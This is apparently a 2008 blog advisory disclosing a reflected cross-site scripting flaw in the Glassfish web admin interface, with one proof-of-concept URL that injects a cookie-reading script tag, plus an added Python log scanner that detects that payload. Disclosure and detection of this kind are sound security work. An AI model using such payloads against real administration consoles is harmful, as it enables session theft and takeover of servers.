
XSS – Glassfish Web Admin Interface (Sun Java System Application

Well, gentlemen, here is another one inside an administration interface. Yet another input validation problem🙂

Cheers!🙂

==============================

XSS – Glassfish Web Admin Interface (Sun Java System Application
Server 9.1_01 (build b09d-fcs) )

==============================

Author: Eduardo Neves a.k.a _eth0_
Date: 10 June 2008
Site: https://webappsecurity.wordpress.com

==============================

APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/

==============================

IMPACT: XSS, XSRF, etc.

Severity: Low (or not?)

==============================

Description:

This vulnerability was found in the Edit HTTP Listener section of the
Glassfish web admin interface.

This is a vulnerable URL:

http://[HOSTNAME]:4848/configuration/httpListenerEdit.jsf?name=<script>alert(document.cookie);</script>&configName=server-config
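
A defender-side check for the URL above, as an added example that is not part of the original advisory or of Glassfish: it scans access-log lines for requests to httpListenerEdit.jsf whose decoded name parameter falls outside an allow-list. The Common Log Format, the allow-list pattern and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter named in the advisory.
TARGET_PATH = "/configuration/httpListenerEdit.jsf"
TARGET_PARAM = "name"
# Assumption: legitimate listener names use only these characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]{1,64}")
# Assumption: Common Log Format, with the request line in a quoted field.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_names(log_line):
    """Return decoded `name` values in this line that fail the allow-list."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path != TARGET_PATH:
        return []
    # parse_qs percent-decodes, so %3Cscript%3E and <script> are treated alike.
    values = parse_qs(url.query).get(TARGET_PARAM, [])
    return [v for v in values if not SAFE_NAME.fullmatch(v)]


def scan(lines):
    """Return (line_number, offending_value) pairs for an iterable of log lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        hits.extend((n, v) for v in suspicious_names(line))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - admin [10/Jun/2008:10:00:01 -0300] "GET /configuration/httpListenerEdit.jsf?name=http-listener-1&configName=server-config HTTP/1.1" 200 5120',
    '192.0.2.44 - admin [10/Jun/2008:10:02:17 -0300] "GET /configuration/httpListenerEdit.jsf?name=%3Cscript%3Ealert(document.cookie);%3C/script%3E&configName=server-config HTTP/1.1" 200 5188',
    '192.0.2.10 - admin [10/Jun/2008:10:03:40 -0300] "GET /common/index.jsf?name=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: suspicious name parameter: {value!r}")
```

The same allow-list can be applied server-side to reject the request before the value is rendered; HTML-encoding the value on output remains the primary fix.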

Categories: websecurity
  1. ulissescastro
    June 11, 2008 at 3:41 am

    AAEAEAEA…… nice one!! +1 duuuuu

  2. Rafael Larcher
    June 11, 2008 at 8:55 pm

    You're the man!!! lol… Big hug, Eduardo!🙂

  3. Thiago
    June 14, 2008 at 9:17 pm

    Larcher's comment doesn't count. He's Dudu's number one fan.

    hehehehe
